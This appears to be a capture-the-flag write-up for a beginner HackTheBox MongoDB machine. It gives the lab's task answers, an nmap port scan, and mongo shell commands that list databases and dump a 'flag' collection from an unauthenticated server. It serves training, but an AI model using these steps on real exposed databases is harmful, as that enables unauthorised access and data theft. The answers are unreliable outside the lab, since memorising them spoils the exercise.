πŸ’‘
β€œIn this machine, we will explore the mongodb environment as well as the way of connecting to it and accessing information that lives inside it. It is a very easy machine, but remember you have to master the absolute basics first and build a solid foundation, before going further."
πŸ’‘
Task 1

How many TCP ports are open on the machine?

2

First, scan all the ports using the -p- parameter on the target machine using nmap.

nmap -sV -p- IP_ADDRESS
Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-14 18:31 EEST
Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 96.70% done; ETC: 18:32 (0:00:01 remaining)
Nmap scan report for IP_ADDRESS
Host is up (0.068s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open  mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.60 seconds
πŸ’‘
Task 2

Which service is running on port 27017 of the remote host?

MongoDB 3.6.8

πŸ’‘
Task 3

What type of database is MongoDB? (Choose: SQL or NoSQL)

NoSQL

Now, let’s install the MongoDB utility by using the following commands in the terminal.

curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz
tar xvf mongodb-linux-x86_64-3.4.7.tgz
cd mongodb-linux-x86_64-3.4.7/bin
./mongo mongodb://IP_ADDRESS:27017
πŸ’‘
Task 4

What is the command name for the Mongo shell that is installed with the mongodb-clients package?

mongo

πŸ’‘
Task 5

What is the command used for listing all the databases present on the MongoDB server? (No need to include a trailing ;)

show dbs

πŸ’‘
Task 6

What is the command used for listing out the collections in a database? (No need to include a trailing ;)

show collections

πŸ’‘
Task 7

What is the command used for dumping the content of all the documents within the collection named flag in a format that is easy to read?

db.flag.find().pretty()

πŸ’‘
Submit Flag
# Inside mongodb shell
show dbs
# admin                  0.000GB
# config                 0.000GB
# local                  0.000GB
# sensitive_information  0.000GB
# users                  0.000GB
use sensitive_information
# switched to db sensitive_information
show collections
# flag
db.flag.find()

Tagged in:

HackTheBox CTF